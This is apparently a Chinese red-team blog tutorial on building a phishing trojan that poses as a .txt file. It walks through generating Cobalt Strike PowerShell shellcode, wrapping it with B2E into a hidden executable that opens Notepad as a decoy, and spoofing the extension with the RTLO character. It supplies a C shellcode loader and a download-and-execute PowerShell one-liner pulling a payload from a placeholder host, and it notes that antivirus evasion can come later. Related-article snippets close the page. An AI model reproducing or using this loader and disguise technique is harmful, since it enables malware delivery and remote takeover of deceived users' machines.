文本.txt釣魚執行木馬

2021-01-21 RedTeam筆記

左側的文件是muma文件。右邊的文件是真實文本文件,兩者看起來基本一模一樣(仔細看的出來圖標略微不一樣,圖標可以後期自行設置),可以看到都是.txt的文件名。

一旦執行左側的木馬文件,我們的木馬就會在後臺悄悄執行了。CS MSF等等C2正常上線。

0x01 生成shellcode

我們使用CS MSF等等C2生成的powershell等shellcode.(任意命令行類型shellcode都可)

這裡我用CS演示。先生成一段powershell命令行執行shellcode




但是我們是釣魚,釣魚就一些迷惑的東西。將先前創建的PowerShell有效負載移至Windows系統,並另存為payload.bat

我們去https://github.com/B00merang-Project/Windows-10-Icons下載Windows10圖標。

在kali中就使用git下載吧

git clone https://github.com/B00merang-Project/Windows-10-Icons

該文件中可能不包含內置Windows 10圖標的確切副本,但是看起來足夠接近,可以很好地利用。

也可以在網上設計圖標或找到更好的圖標

0x02 將PNG轉換為ICO格式

PNG將需要轉換為Windows ICO圖標格式。
可以使用在線工具(如ConvertICO:https://www.convertico.com )完成此操作。
只需將所需的PNG上傳到網站,它將以ICO格式輸出。

0x03 安裝BAT2EXE

訪問以下URL以下載B2E。

https://github.com/tokyoneon/B2E/

下載下來後直接安裝執行

0x04 導入payload.bat

完成後,啟動B2E,然後單擊「打開/Open」按鈕以導入之前創建的payload.bat。

0x05 將.bat轉為.exe

現在將單詞notepad添加到payload.bat的頂部,然後單擊「保存」。在執行PowerShell有效負載之前,這將使可執行文件在Windows計算機上打開記事本。這樣做會使目標用戶相信他們剛剛單擊的文件確實是合法的文本文件。

完成後,選中「 Icon」選項將其打勾啟用,然後使用「 …」按鈕導入在上一步中創建ico圖標。

然後,將Exe格式更改為「 64位Windows |(不可見)」,以防止在目標用戶打開文件時彈出任何終端。



之後點擊頂部菜單欄Converter-->Convert創建exe文件,然後將文件另存為sertxt.exe

0x06 &#8238 反轉字符串欺騙擴展名

&#8238連結:https://unicode-table.com/en/202E/

使用Unicode字符來反轉字符在文件名中的顯示順序。&#8238後的內容將進行反轉(從右至左)

木馬上線

可以看到打開執行後也是文本界面(經過測試發現當關閉文本窗口時才會執行我們的shellcode)測試時還發現是不免殺windows defender,當然後期可以對cs生成的powershell做免殺處理

總結

其實全程下來核心在於&#8238(後面有";",不然會看不到)反轉字符這裡,試想,我們可不可以將現有的任意exe反轉成這種類似的具有迷惑性的記事本文件呢,只需要在程序代碼最後調用系統函數執行notepad即可,這樣應該會達到上述演示的相同效果(這只是我個人猜想並沒有驗證,有興趣的老哥可以驗證一下)

示例代碼:

#include <stdio.h>
#include <windows.h>
using namespace std;
int main()
{
    char shellcode[] = "把shellcode粘貼到這裡";
    LPVOID lpAlloc = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(lpAlloc, shellcode, sizeof shellcode);
    ((void(*)())lpAlloc)();
    system("notepad");  # 這段代碼放在最前還是最後取決於測試結果
    return 0;
}

由此可知 只要是遠程上線的都可,比如遠程加載powershell腳

powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/payload.ps1');"

相關焦點

  • 木馬文件藉助RTLO字符傳播 哈勃分析系統提醒小心辨識-木馬文件...
    近期,騰訊電腦管家旗下哈勃分析系統發現,有不法分子利用一種名為「RTLO」的特殊字符,將帶有木馬文件的名字進行倒序排列,誘使不明真相的用戶下載運行,達到竊取用戶隱私的目的。由於它可以重新排列字符的特性,會被不法分子利用從而達到欺騙目標,使得用戶運行某些具有危害性的可執行文件。例如,通過將Windows自帶的記事本notepad.exe程序重命名,先插入「RTLO」字符,加上「txt.exe」,最後就能成功偽裝出一個「exe.txt」的普通文檔,但文件仍是exe可執行文件。
  • 獨家揭秘「看門狗」團夥三大手段,360安全大腦釋能戳穿遠控木馬...
    360安全大腦基於持續跟蹤數據,並對攻擊樣本進行梳理分析後發現,「看門狗」團夥長期通過申請正規軟體開發商籤名,進而利用白加黑方式執行遠控木馬;釣魚郵件定向投毒,並通過漏洞利用啟動遠控木馬;偽裝正規聊天工具捆綁遠控模塊等三大手段橫行網絡
  • Python讀寫txt文本(示例說明)
    txt讀寫相對來說比較簡單寫,以下通過一個簡單的示例來感受下讀寫的效果。
  • 釣魚木馬偽裝支付寶大竊錢財
    > 5月23日,360手機安全中心截獲一款偽造淘寶登陸界面的手機釣魚木馬
  • 如何不花錢將微信聊天記錄導出txt、文本?
    求大神支招「生活中有不少場景都需要將微信聊天記錄導成txt文本。和女朋友多年的微信聊天記錄,裡面有很多屬於兩個人的甜蜜回憶,可以將其導出txt文本,然後列印成小冊子作為紀念,也可以使用python工具生成詞雲展示你們最常使用的詞語,讓女朋友感受一下來自理科生的浪漫。
  • 釣魚網站源碼帶木馬,歡迎進入不知道如何被騙的技術詐騙2.0時代
    一方面利用仿冒的二手交易平臺釣魚網站以低價商品吸引「魚兒」上鉤,一方面販賣含後門的釣魚網站源碼,套取他人「詐騙「果實。近期收錄到一款仿冒二手電商平臺的釣魚網站源碼進行詐騙的案件,復現過程發現了釣魚網站的原理(盜取個人身份信息的同時騙取資金),同時還發現其源碼存在「黑吃黑「的現象。
  • 入侵之命令行下載、運行木馬
    這需要種植木馬,且這個木馬要能夠往外面咱們自己的伺服器或者郵箱等報告自己的運行狀態。如何下載木馬並種植到肉雞上面的問題,其實網上也有零散的,我這兒算是整理,同時加上自己的體會。大家還是多實踐,多搞搞肉雞。(最好練習命令行,3389登陸上去一對記錄,如被追蹤很危險的。
  • access組合框行來源加載txt文本的數據
    在access資料庫中,我們不僅可以讀取access創建的數據表上的數據,還是能讀取TXT文本上的數據 如創建一個1.TXT的文本文件,裡面填寫幾個值,用分號隔開
  • 驅動人生系列木馬狼煙再起!以新冠疫情釣魚郵件為掩護大肆傳播
    驅動人生系列木馬狼煙再起!以新冠疫情釣魚郵件為掩護大肆傳播就在全球各國深陷新冠疫情(COVID-19)荼毒之際,不少網絡攻擊者緊跟疫情熱點,或冒充衛生醫療機構,或捏造抗疫要聞,假借釣魚郵件煽風點火,大行網絡攻擊之事。
  • Python腳本4:根據txt文本,批量創建文件夾
    根據txt文本每一行的類別,創建文件名為類別的文件夾。# 目標是讀取txt的每一行數據創建對應名字的文件夾# 1通過函數調用解決創建固定的文件夾# 2創建一個txt文件輸出裡面的內容輸出# 3將txt輸出內容和創建文件夾連結完成任務# 4後續補充檢測文本文件是否存在,不在報錯# 5後續補充如果已經有了文本中的文件夾跳過這個文件名創建下一個# 結束# 反思:目前創建的文件夾目錄固定、文本文檔位置固定# 完善功能:# 1.先把文件夾目錄改為交互式用戶設置
  • Python處理txt文本
    背景目的上一篇推文可以獲得WOS導出文獻內容,接著就是對文本進行處理。提取出其中的有用信息,比如 作者信息、年份、引用因子、題目等等,同樣繼續用Python處理很方便。二.實現方法2.1 分析需要什麼樣的數據結構txt 文檔內容可以簡化為如下的文檔結構,每一篇文獻的參數用兩位大寫字母表示。比如,TI 表示文獻的標題,AU表示文獻的作者等等,ER表示到達文獻的末尾,同時文獻與文獻之間用空行分隔!
  • 「抓雞狂魔」 Darkcomet木馬酷愛「釣魚」 騰訊電腦管家技術追蹤令...
    竊取用戶敏感數據、個人銀行帳戶和密碼等信息,或者在設備上執行惡意代碼實施進一步的網絡攻擊活動,形形色色的釣魚郵件讓人防不勝防,也令人深惡痛絕。Darkcomet木馬誕生於2008年,又稱「暗黑彗星」木馬,是國外有名的後門類木馬。該木馬運行後不僅記錄並上傳受害者輸入的密碼、攝像頭信息等隱私內容,還可根據服務端指令執行下載文件、啟動程序、運行腳本等控制操作。同時,攻擊者還可用被控制的電腦作跳板,對其它目標發起DDoS攻擊。儘管木馬作者於2012年已停止了對「暗黑彗星」木馬的更新,但是目前仍有大量攻擊者使用該工具進行網絡攻擊。
  • 永恆之藍下載器木馬再度升級,新增「疫情」釣魚郵件傳播能力
    日前,騰訊安全威脅情報中心檢測發現,永恆之藍下載器木馬再度升級,新增郵件蠕蟲傳播能力,木馬在中招用戶機器上運行後,會自動向其通訊錄聯繫人發起二次攻擊,危害極大,目前已有大量知名企業被感染。騰訊安全提醒企業注意防範,及時安裝相關補丁,並啟用安全軟體防禦攻擊,避免重大安全事故發生。
  • Excel表格學習txt文本數據做Excel表格和添加自動更新序號的方法
    這期跟大家學習在使用電腦處理「txt文本文檔」數據做成Excel表格的方法和Excel表格添加「自動更新序號」的方法。首先我們打開想要處理的「txt文本文檔」打開後把內容複製到Excel表格中。通常,我們把內容複製後,會出現數據連在一起的情況,下面我們就開始解決這個問題選中內容,選擇數據,選擇分列,點擊下一步,選擇其他,因為文本裡面的內容都是用逗號隔開的!
  • excel,word,TXT文件之間的轉化
    本文解決問題如下:1、有規律的word或txt文檔複製到excel,快速做成表格2、excel表格以圖片的形式複製到word3、excel表格以圖表的形式複製到word支持後續在word繼續編輯4、excel跨行的內容以文本形式快速複製到word------------------- 接下來讓我逐一去介紹上述方法 -------------------1、有規律的word或txt文檔複製到excel,
  • 如何快速將多個txt文檔合併成一個txt文檔?操作簡單高效
    txt文本文檔是最常見的文件格式,txt格式比較簡單,體積小、存儲簡單方便,不容易中病毒。使用起來也很方便,不管是在計算機,還是在行動裝置,txt文本文檔屬於通用格式,都能夠輕鬆打開。當然,有利也有弊,txt文檔只能支持純文字,不支持圖像,不夠生動。
  • 訂製木馬病毒濫發釣魚簡訊 匿名手機卡偏僻窩點照抓不誤
    (原標題:訂製木馬病毒濫發釣魚簡訊 匿名手機卡偏僻窩點照抓不誤)
  • FSO應用|讀取txt文件
    >上節課我們講了關於FSO對象以及他的textstream文本流的一些基本知識點,今天我們就分享一個用FSO對象操作讀取txt文本文件的實例。下面是一個文本文件,裡面有一些姓名、性別、出生日期等信息,我們需要將裡面種的內容導入到excel文件中。這節課我們講解,在這裡我們採取FSO對象的一些方法來讀取。
  • 批量合併txt嚶
    文件一、多個txt文件在同一個目錄下每一個txt的結構如下在該目錄下建立一個文本文檔,如」Merge_NoSubFolder.txt」 2. 複製下列命令,保存@echo off copy nul all.tx for %%a in (*.txt)do type %%a >>all.tx &&  echo.
  • FSO對象操作txt文件
    比如這節課要講的txt文本文件。操作txt除了常規VBA文件處理語句open、write等方法,還有一種方法是使用FSO對象來操作。那麼什麼是FSO對象呢?", True)'用FSO對象創建一個文本流用於寫入內容fstxt.WriteLine (Now) '用文本流的WriteLine方法,把本機的時間寫入文件。